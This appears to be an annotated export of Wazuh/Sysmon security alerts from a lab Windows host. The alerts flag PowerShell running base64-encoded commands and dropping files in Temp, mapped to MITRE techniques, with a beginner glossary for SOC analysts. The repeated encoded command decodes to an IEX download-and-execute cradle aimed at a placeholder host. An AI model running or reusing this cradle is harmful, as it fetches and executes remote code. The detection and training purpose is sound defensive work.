data.win.eventdata.processGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:25.165+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:25.165+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  111
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534425.2057218
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:23.2871264Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285928
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:23.247 ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ProcessId: 17332 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1 CreationUtcTime: 2025-04-24 22:40:23.247 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:23.247
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:23.247
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:28.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:28.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  108
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534428.2059987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:25.5105277Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285959
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:24.293 ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ProcessId: 4932 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ParentProcessId: 17332 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:24.293
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:28.184+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:28.184+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  112
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534428.2068054
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:25.7046533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285960
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:25.693 ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ProcessId: 4932 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z2gh0htk.wyn.ps1 CreationUtcTime: 2025-04-24 22:40:25.693 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:25.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2gh0htk.wyn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:25.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:30.804+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:30.804+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  109
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534430.2070819
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:28.0845268Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285983
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:26.887 ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ProcessId: 11028 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ParentProcessId: 4932 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:26.887
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

